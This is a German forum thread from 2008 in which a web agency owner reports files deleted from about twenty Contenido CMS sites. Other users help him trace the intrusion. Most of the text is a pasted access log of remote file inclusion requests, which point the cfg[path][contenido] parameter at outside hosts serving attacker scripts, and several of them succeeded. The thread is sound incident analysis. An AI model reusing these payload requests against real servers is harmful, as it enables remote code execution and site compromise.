Hackangriff, sämtliche Daten aus den 777-Verzeichnissen weg

Martin S. · Beitrag von **Martin S.** » Di 10. Jun 2008, 09:40

Hallo zusammen, heute wurde ich bzw. meine Kunden Opfer von einem Hackangriff. Sämtliche Dateien aus den 777-Verzeichnissen wurden gelöscht, also upload hat keiner Bilder mehr, css keine Styles und templates keine HTML-Dateien mehr, gesehen habe ich auch, dass der cronjobs-Ordner auf ein aktuelles Erstellungsdatum gesetzt wurde. Hat einer von euch schon solche Erfahrungen gemacht? Es handelt sich bei mir um fast 20 Systeme mit verschiedensten Version von 4.6 bis 4.8, ich habe zwar von allem Backups, aber eine Rücksicherung behebt ja noch nicht das Sicherheitsloch.

Beitrag von **Halchteranerin** » Di 10. Jun 2008, 09:54

Waren das neu aufgesetzte 4.6-4.8er, oder solche, die von alten Versionen durch Upgrade aktualisiert wurden? Gibt es Dateien auf dem Server, die nicht dorthin gehören?

tono · Beitrag von **tono** » Di 10. Jun 2008, 09:58

Welche Version trägt denn das System das betroffen ist? Oder sind alle 20 betroffen?

Schau in den Webserver Access-Logfiles nach um die Zeit, zu der es passiert ist (cronjobs-Änderungsdatum) um herauszufinden wie die Hacker eingebrochen sind.

Beitrag von **Dodger77** » Di 10. Jun 2008, 09:58

Interessant wäre auch die Frage, ob dies bei verschiedenen Webhoster oder evtl. sogar auf genau einem Server passiert ist. Bei den 4.6.x-Versionen kommt es auch auf die genaue Version drauf an.

Kann der Angriffweg durch die Logfiles nachvollzogen werden? Kommt dort folgende Zeichenkette vor:

Code: Alles auswählen

cfg[path][contenido]=http

? Hat der Webhoster schon etwas zu dem Hack gesagt?

tono · Beitrag von **tono** » Di 10. Jun 2008, 10:00

Oh, cool

Gleich 3 paralell geschriebene Posts. Da soll einer sagen SICHERHEIT wird hier nicht großgeschrieben

Beitrag von **Halchteranerin** » Di 10. Jun 2008, 10:10

tono hat geschrieben:Oh, cool Gleich 3 paralell geschriebene Posts. Da soll einer sagen SICHERHEIT wird hier nicht großgeschrieben

Martin S. · Beitrag von **Martin S.** » Di 10. Jun 2008, 10:13

erst mal danke für die schnelle Reaktion. Die Angriffe sind alle auf einem Server passiert. Hier habe ich einen Ordner cms und dann kunde 1, kunde 2 usw. hier sind in den letzten Jahren diverse Systeme angelegt worden, da manche Kunden für die Sicherheit nicht immer die nötigen Mittel bereitstellen, sind auch nicht immer alles Systeme auf die aktuellsten Versionen gebracht worden, deshalb gibt es hier folgende Versionen 4.6.8, 4.6.15, 4.6.23, 4.8.2.
In den htaccess-Einstellungen gibt es folgendes:

php_flag magic_quotes_gpc on
php_flag register_long_arrays on
php_flag display_errors on
php_flag register_globals on
php_flag allow_call_time_pass_reference on

Die Log-Files des Servers kann ich mir noch nicht ansehen, weil ich keinen Root-Zugriff habe. Aber von der Zeit her sieht es aus als wäre es am 09.06.2008 - 08:15 passiert, weil das der cronjobs-Ordner als Erstellungsdatum hat.

Martin S. · Beitrag von **Martin S.** » Di 10. Jun 2008, 10:31

Hab jetzt die Logfiles, wenn ich nach cfg[path][contenido]=http suche bekomme ich folgendes Ergebnis, sorry ist etwas länger. Bin aber nicht gerade ein Fuchs mit der Deutung des Logs, sagt euch das was?!

Code: Alles auswählen

67.228.91.67 - - [01/Jun/2008:04:53:47 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.811"
67.228.91.67 - - [01/Jun/2008:04:53:47 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.811"
67.228.91.67 - - [01/Jun/2008:04:53:48 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.811"
72.21.38.82 - - [01/Jun/2008:05:24:07 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.810"
72.21.38.82 - - [01/Jun/2008:05:24:08 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.810"
72.21.38.82 - - [01/Jun/2008:05:24:08 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.810"
70.84.106.68 - - [01/Jun/2008:05:24:11 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.810"
70.84.106.68 - - [01/Jun/2008:05:24:12 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.810"
70.84.106.68 - - [01/Jun/2008:05:24:12 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.810"
69.72.215.178 - - [01/Jun/2008:05:24:21 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.810"
69.72.215.178 - - [01/Jun/2008:05:24:21 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.810"
69.72.215.178 - - [01/Jun/2008:05:24:21 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.810"
80.86.92.124 - - [01/Jun/2008:05:24:22 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.76"
80.86.92.124 - - [01/Jun/2008:05:24:22 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.76"
80.86.92.124 - - [01/Jun/2008:05:24:22 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.76"
77.221.157.210 - - [01/Jun/2008:18:11:27 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://food.kyungnam.ac.kr/board/skin/zero_vote/images/borda2.jpg? HTTP/1.1" 404 402 "-" "libwww-perl/5.805"
77.221.157.210 - - [01/Jun/2008:18:11:27 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://food.kyungnam.ac.kr/board/skin/zero_vote/images/borda2.jpg? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
77.221.157.210 - - [01/Jun/2008:18:11:27 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://food.kyungnam.ac.kr/board/skin/zero_vote/images/borda2.jpg? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
58.181.249.244 - - [01/Jun/2008:18:55:12 +0200] "GET /cms/klemm/contenido/includes/include.frontend.group.subnav.php?cfg[path][contenido]=http://itmovement.com/taxy/templates_nogui/editor/_samples/mod.txt?? HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible;)"
83.218.64.197 - - [01/Jun/2008:23:44:58 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://wellingtonindustries.com/idi.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.805"
83.218.64.197 - - [01/Jun/2008:23:44:58 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://wellingtonindustries.com/idi.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
83.218.64.197 - - [01/Jun/2008:23:44:58 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://wellingtonindustries.com/idi.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
84.19.182.184 - - [01/Jun/2008:23:45:36 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 402 "-" "libwww-perl/5.65"
84.19.182.184 - - [01/Jun/2008:23:45:36 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 402 "-" "libwww-perl/5.65"
84.19.182.184 - - [01/Jun/2008:23:45:36 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 388 "-" "libwww-perl/5.65"
84.19.182.184 - - [01/Jun/2008:23:45:36 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.65"
84.19.182.184 - - [01/Jun/2008:23:45:36 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 388 "-" "libwww-perl/5.65"
84.19.182.184 - - [01/Jun/2008:23:45:36 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.65"
84.19.182.184 - - [01/Jun/2008:23:46:31 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 402 "-" "libwww-perl/5.65"
84.19.182.184 - - [01/Jun/2008:23:46:32 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 388 "-" "libwww-perl/5.65"
84.19.182.184 - - [01/Jun/2008:23:46:32 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.65"
213.180.89.68 - - [01/Jun/2008:23:50:22 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 402 "-" "libwww-perl/5.79"
213.180.89.68 - - [01/Jun/2008:23:50:27 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 388 "-" "libwww-perl/5.79"
213.180.89.68 - - [01/Jun/2008:23:50:27 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 200 - "-" "libwww-perl/5.79"
72.36.224.170 - - [01/Jun/2008:23:53:20 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://meganfoxfans.net/images/echo.txt?? HTTP/1.1" 404 402 "-" "libwww-perl/5.811"
72.36.224.170 - - [01/Jun/2008:23:53:20 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://meganfoxfans.net/images/echo.txt?? HTTP/1.1" 404 388 "-" "libwww-perl/5.811"
72.36.224.170 - - [01/Jun/2008:23:53:20 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://meganfoxfans.net/images/echo.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.811"
203.189.129.129 - - [01/Jun/2008:23:54:57 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.walmax.eu/upload/.help/test.txt??? HTTP/1.0" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
203.189.129.129 - - [01/Jun/2008:23:54:57 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.walmax.eu/upload/.help/test.txt??? HTTP/1.0" 404 388 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
218.38.34.67 - - [01/Jun/2008:23:55:57 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.helmos.gr/helmos_en/links/test.txt?? HTTP/1.1" 404 388 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
218.38.34.67 - - [01/Jun/2008:23:55:57 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.helmos.gr/helmos_en/links/test.txt?? HTTP/1.1" 404 402 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
213.180.89.68 - - [02/Jun/2008:00:07:36 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 402 "-" "libwww-perl/5.79"
213.180.89.68 - - [02/Jun/2008:00:07:37 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 388 "-" "libwww-perl/5.79"
213.180.89.68 - - [02/Jun/2008:00:07:37 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 200 - "-" "libwww-perl/5.79"
200.80.42.159 - - [02/Jun/2008:00:11:54 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://wellingtonindustries.com/id.txt?? HTTP/1.1" 404 402 "-" "libwww-perl/5.805"
200.80.42.159 - - [02/Jun/2008:00:11:55 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://wellingtonindustries.com/id.txt?? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
200.80.42.159 - - [02/Jun/2008:00:11:55 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://wellingtonindustries.com/id.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
85.25.10.95 - - [02/Jun/2008:00:30:36 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 402 "-" "Advanced Browser (http://www.avantbrowser.com)"
85.25.10.95 - - [02/Jun/2008:00:30:37 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 388 "-" "Advanced Browser (http://www.avantbrowser.com)"
80.67.26.67 - - [02/Jun/2008:01:40:43 +0200] "GET /cms/klemm/cms/front_content.php//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.madbutphat.de//include/template/templates_c/.../contr2.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.808"
80.67.26.67 - - [02/Jun/2008:01:40:43 +0200] "GET /cms/klemm/cms//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.madbutphat.de//include/template/templates_c/.../contr2.txt?? HTTP/1.1" 404 403 "-" "libwww-perl/5.808"
80.67.26.67 - - [02/Jun/2008:01:54:32 +0200] "GET //contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.madbutphat.de//include/template/templates_c/.../contr2.txt?? HTTP/1.1" 404 388 "-" "libwww-perl/5.808"
80.67.26.67 - - [02/Jun/2008:01:54:33 +0200] "GET /cms/klemm/cms/front_content.php//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.madbutphat.de//include/template/templates_c/.../contr2.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.808"
80.67.26.67 - - [02/Jun/2008:01:54:33 +0200] "GET /cms/klemm/cms//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.madbutphat.de//include/template/templates_c/.../contr2.txt?? HTTP/1.1" 404 403 "-" "libwww-perl/5.808"
88.199.39.252 - - [02/Jun/2008:09:48:24 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://wellingtonindustries.com/id-gun.txt? HTTP/1.1" 404 402 "-" "libwww-perl/5.805"
88.199.39.252 - - [02/Jun/2008:09:48:24 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://wellingtonindustries.com/id-gun.txt? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
88.199.39.252 - - [02/Jun/2008:09:48:24 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://wellingtonindustries.com/id-gun.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
72.47.204.44 - - [02/Jun/2008:10:06:43 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bestpaket.ru/netcat//dump/alba.txt?? HTTP/1.1" 404 402 "-" "libwww-perl/5.79"
72.47.204.44 - - [02/Jun/2008:10:06:43 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bestpaket.ru/netcat//dump/alba.txt?? HTTP/1.1" 404 388 "-" "libwww-perl/5.79"
72.47.204.44 - - [02/Jun/2008:10:06:44 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bestpaket.ru/netcat//dump/alba.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.79"
217.20.118.202 - - [02/Jun/2008:12:03:31 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 402 "-" "libwww-perl/5.805"
217.20.118.202 - - [02/Jun/2008:12:03:33 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
217.20.118.202 - - [02/Jun/2008:12:03:38 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
212.83.213.66 - - [02/Jun/2008:12:19:47 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 402 "-" "libwww-perl/5.805"
212.83.213.66 - - [02/Jun/2008:12:19:47 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
212.83.213.66 - - [02/Jun/2008:12:19:47 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
212.83.213.66 - - [02/Jun/2008:12:20:20 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 402 "-" "libwww-perl/5.805"
212.83.213.66 - - [02/Jun/2008:12:20:20 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
212.83.213.66 - - [02/Jun/2008:12:20:20 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
85.214.95.209 - - [02/Jun/2008:22:48:25 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt???? HTTP/1.1" 404 402 "-" "libwww-perl/5.805"
85.214.95.209 - - [02/Jun/2008:22:48:25 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt???? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
85.214.95.209 - - [02/Jun/2008:22:48:25 +0200] "GET /cms/klemm/cms/front_content.php/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt???? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
85.214.95.209 - - [02/Jun/2008:22:52:25 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt???? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
70.168.36.247 - - [03/Jun/2008:03:57:49 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://mypoems.kaykelly.net/SMF/Sources/borda2.jpg? HTTP/1.1" 404 402 "-" "libwww-perl/5.803"
70.168.36.247 - - [03/Jun/2008:03:57:55 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://mypoems.kaykelly.net/SMF/Sources/borda2.jpg? HTTP/1.1" 200 - "-" "libwww-perl/5.803"
64.38.8.186 - - [03/Jun/2008:08:17:55 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.tripiwarez.eu/script/blid.txt? HTTP/1.1" 404 402 "-" "libwww-perl/5.811"
64.38.8.186 - - [03/Jun/2008:08:17:55 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.tripiwarez.eu/script/blid.txt? HTTP/1.1" 404 388 "-" "libwww-perl/5.811"
64.38.8.186 - - [03/Jun/2008:08:17:56 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.tripiwarez.eu/script/blid.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.811"
74.53.240.146 - - [04/Jun/2008:00:44:01 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.urania-ffo.de/Kalender//tools/install/cmd.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.79"
74.53.240.146 - - [04/Jun/2008:00:44:01 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.urania-ffo.de/Kalender//tools/install/cmd.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.79"
74.53.240.146 - - [04/Jun/2008:00:44:01 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.urania-ffo.de/Kalender//tools/install/cmd.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.79"
74.53.240.146 - - [04/Jun/2008:00:44:58 +0200] "GET /cms/klemm/cms/front_content.php?changelang=2/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.urania-ffo.de/Kalender//tools/install/cmd.txt??? HTTP/1.1" 200 10304 "-" "libwww-perl/5.79"
66.246.185.183 - - [07/Jun/2008:19:14:18 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 402 "-" "libwww-perl/5.810"
66.246.185.183 - - [07/Jun/2008:19:14:19 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 388 "-" "libwww-perl/5.810"
66.246.185.183 - - [07/Jun/2008:19:14:19 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.810"
67.15.205.17 - - [07/Jun/2008:19:15:33 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://3oliver.com/dev/id.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.811"
67.15.205.17 - - [07/Jun/2008:19:15:33 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://3oliver.com/dev/id.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.811"
67.15.205.17 - - [07/Jun/2008:19:15:33 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://3oliver.com/dev/id.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.811"
216.127.70.91 - - [07/Jun/2008:19:25:01 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 402 "-" "libwww-perl/5.79"
216.127.70.91 - - [07/Jun/2008:19:25:01 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 388 "-" "libwww-perl/5.79"
216.127.70.91 - - [07/Jun/2008:19:25:01 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.79"
216.127.70.91 - - [07/Jun/2008:19:25:04 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 402 "-" "libwww-perl/5.79"
216.127.70.91 - - [07/Jun/2008:19:25:04 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 388 "-" "libwww-perl/5.79"
216.127.70.91 - - [07/Jun/2008:19:25:04 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.79"
216.127.70.91 - - [07/Jun/2008:19:25:08 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 402 "-" "libwww-perl/5.79"
216.127.70.91 - - [07/Jun/2008:19:25:08 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 388 "-" "libwww-perl/5.79"
216.127.70.91 - - [07/Jun/2008:19:25:08 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.79"
87.106.178.42 - - [07/Jun/2008:19:50:02 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://h1.ripway.com/pantex/scan/id.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.805"
87.106.178.42 - - [07/Jun/2008:19:50:02 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://h1.ripway.com/pantex/scan/id.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
87.106.178.42 - - [07/Jun/2008:19:50:02 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://h1.ripway.com/pantex/scan/id.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
212.227.65.79 - - [07/Jun/2008:20:37:46 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 402 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
212.227.65.79 - - [07/Jun/2008:20:37:46 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 388 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
89.218.85.18 - - [08/Jun/2008:06:14:05 +0200] "GET /cms/klemm/cms//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 403 "-" "libwww-perl/5.805"
89.218.85.18 - - [08/Jun/2008:06:14:05 +0200] "GET //contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
